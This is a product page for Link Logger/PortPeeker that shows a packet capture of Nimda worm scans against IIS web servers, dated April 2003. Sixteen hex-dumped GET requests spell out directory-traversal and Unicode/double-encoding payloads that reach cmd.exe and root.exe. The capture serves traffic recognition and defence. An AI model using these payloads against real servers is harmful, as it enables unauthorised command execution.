Link Logger Home ZyXel Banner Binary Visions
Netgear
LinkSYS
Router

Nimda
Link Logger for Windows
Home Home Product Info Product Info Download Download/Purchase Support Support  
Link Logger for Windows

NewsLatest News

Screen ShotsScreenshots

Customer CommentsFeedback

Common ScansScans

Additional ResourcesResources

PortPeekerPortPeeker

PortPeeker Capture of Nimda Traffic

Nimda description on Cert.org

TCP Port 80 (note 16 individual connections)

Targets unpatched IIS Servers

x.x.x.x : 1385 TCP Data In
--- 16/04/2003 13:18:02.115
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
0010 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
0020 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
0030 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c
0040 6C 6F 73 65 0D 0A 0D 0A                         lose....

x.x.x.x : 2754 TCP Data In
--- 16/04/2003 13:19:32.205
0000 47 45 54 20 2F 4D 53 41 44 43 2F 72 6F 6F 74 2E GET /MSADC/root.
0010 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F exe?/c+dir HTTP/
0020 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www..
0030 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F Connnection: clo
0040 73 65 0D 0A 0D 0A                               se....

x.x.x.x : 4020 TCP Data In
--- 16/04/2003 13:21:02.535
0000 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
0010 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
0020 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
0030 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
0040 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....

x.x.x.x : 1391 TCP Data In
--- 16/04/2003 13:22:32.614
0000 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
0010 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
0020 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
0030 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
0040 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....

x.x.x.x : 2692 TCP Data In
--- 16/04/2003 13:24:02.664
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
0010 32 35 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 255c../winnt/sys
0020 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
0030 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
0040 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
0050 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....

x.x.x.x : 3907 TCP Data In
--- 16/04/2003 13:25:32.763
0000 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
0010 25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E %255c../..%255c.
0020 2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E ./..%255c../winn
0030 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
0040 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 xe?/c+dir HTTP/1
0050 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
0060 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 onnnection: clos
0070 65 0D 0A 0D 0A                                  e....

x.x.x.x : 1297 TCP Data In
--- 16/04/2003 13:27:02.833
0000 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
0010 25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E %255c../..%255c.
0020 2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E ./..%255c../winn
0030 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
0040 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 xe?/c+dir HTTP/1
0050 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
0060 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 onnnection: clos
0070 65 0D 0A 0D 0A                                  e....

x.x.x.x : 2555 TCP Data In
--- 16/04/2003 13:28:32.902
0000 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 32 35 GET /msadc/..%25
0010 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 2E 5c../..%255c../.
0020 2E 25 32 35 35 63 2F 2E 2E 25 63 31 25 31 63 2E .%255c/..%c1%1c.
0030 2E 2F 2E 2E 25 63 31 25 31 63 2E 2E 2F 2E 2E 25 ./..%c1%1c../..%
0040 63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 c1%1c../winnt/sy
0050 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
0060 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0070 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
0080 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0090 0A                                              .

x.x.x.x : 3783 TCP Data In
--- 16/04/2003 13:30:03.012
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
0010 63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 c1%1c../winnt/sy
0020 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
0030 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0040 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
0050 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0060 0A                                              .

x.x.x.x : 1201 TCP Data In
--- 16/04/2003 13:31:33.152
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
0010 63 30 25 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 c0%2f../winnt/sy
0020 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
0030 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0040 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
0050 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0060 0A                                              .

x.x.x.x : 2385 TCP Data In
--- 16/04/2003 13:33:03.281
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
0010 63 30 25 61 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 c0%af../winnt/sy
0020 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
0030 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0040 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
0050 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0060 0A                                              .

x.x.x.x : 3558 TCP Data In
--- 16/04/2003 13:34:33.321
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
0010 63 31 25 39 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 c1%9c../winnt/sy
0020 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
0030 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0040 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
0050 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0060 0A                                              .

x.x.x.x : 4902 TCP Data In
--- 16/04/2003 13:36:03.741
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
0010 25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74 2F 73 %35%63../winnt/s
0020 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F ystem32/cmd.exe?
0030 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0.
0040 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: www..Conn
0050 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
0060 0D 0A                                           ..

x.x.x.x : 2328 TCP Data In
--- 16/04/2003 13:37:33.780
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
0010 25 33 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 %35c../winnt/sys
0020 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
0030 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
0040 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
0050 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....

x.x.x.x : 3598 TCP Data In
--- 16/04/2003 13:39:03.990
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
0010 32 35 25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74 25%35%63../winnt
0020 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 /system32/cmd.ex
0030 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E e?/c+dir HTTP/1.
0040 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host: www..Co
0050 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nnnection: close
0060 0D 0A 0D 0A                                     ....

x.x.x.x : 4981 TCP Data In
--- 16/04/2003 13:40:34.129
0000 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
0010 32 35 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 252f../winnt/sys
0020 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
0030 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
0040 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
0050 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....

While PortPeeker is not an officially supported product if you have any suggestions or find any bugs please send them to PortPeeker@LinkLogger.com